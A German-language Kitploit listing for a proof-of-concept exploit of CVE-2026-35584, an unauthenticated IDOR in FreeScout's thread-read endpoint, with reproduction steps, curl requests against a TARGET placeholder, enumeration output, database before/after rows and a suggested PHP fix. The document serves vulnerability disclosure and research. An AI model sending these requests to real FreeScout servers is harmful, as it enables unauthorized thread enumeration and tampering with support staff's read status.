Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-35584 — Proof-of-Concept-Exploit für eine nicht authentifizierte IDOR-Schwachstelle in FreeScout, die die Aufzählung von Threads und die Manipulation des Lesestatus über manipulierte HTTP-Anfragen ermöglicht. | Kitploit
Tools/GitHubGitHub/spoo1k/cve-2026-35584
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubspoo1k/cve-2026-35584

CVE-2026-35584

Proof-of-Concept-Exploit für eine nicht authentifizierte IDOR-Schwachstelle in FreeScout, die die Aufzählung von Threads und die Manipulation des Lesestatus über manipulierte HTTP-Anfragen ermöglicht.

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-35584

POC - CVE-2026-35584 FreeScout

Beschreibung

Zusammenfassung

Der Endpunkt GET /thread/read/{conversation_id}/{thread_id} erfordert keine Authentifizierung und validiert nicht, ob die angegebene thread_id zur angegebenen conversation_id gehört. Dadurch kann jeder nicht authentifizierte Angreifer:

Beliebige Threads als gelesen markieren, indem beliebige IDs übergeben werden Gültige Thread-IDs über HTTP-Antwortcodes (200 vs. 404) enumerieren opened_at-Zeitstempel über Konversationen hinweg manipulieren (IDOR)

root@kitploit:~
Betroffene Version
1.8.211 (aktuell)

Schritte zur Reproduktion

Zwei Konversationen erstellen (conv_id=1 und conv_id=2) Einen Thread in Konversation 2 erstellen (thread_id=3) Ohne jegliche Authentifizierung senden: GET /thread/read/1/3 In der Datenbank überprüfen — opened_at von thread_id=3 ist nun gesetzt, obwohl über die falsche conversation_id darauf zugegriffen wurde

PoC

root@kitploit:~
curl -v "http://TARGET/thread/read/1/3"

Gibt HTTP 200 zurück und setzt opened_at bei Thread 3

Auswirkungen

Keine Authentifizierung erforderlich IDOR: thread_id wird nicht gegen conversation_id validiert Thread-Enumeration: HTTP 200 = gültiger Thread, 404 = ungültig Manipulation von Gelesen/Ungelesen-Metriken, die von Support-Agenten verwendet werden Bricht das Konversations-Isolationsmodell

Vorgeschlagener Fix

root@kitploit:~
if ($thread->conversation_id !== (int)$conversation_id) {
abort(403);
}

PoC-Ausgabe

Thread-Enumeration (nicht authentifiziert)

root@kitploit:~
curl -v "http://TARGET/thread/read/1/1" → HTTP 200 (gültiger Thread)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/2" → HTTP 200 (gültiger Thread)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/3" → HTTP 200 (IDOR - Thread gehört zu Konversation 2)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/4" → HTTP 404 (ungültiger Thread)

Datenbankzustand nach der Ausnutzung

Vorher: | id | conversation_id | opened_at | | 3 | 2 | NULL |

Nach GET /thread/read/1/3 (ohne Authentifizierung): | id | conversation_id | opened_at | | 3 | 2 | 2026-04-03 23:19:46 |

Tool herunterladen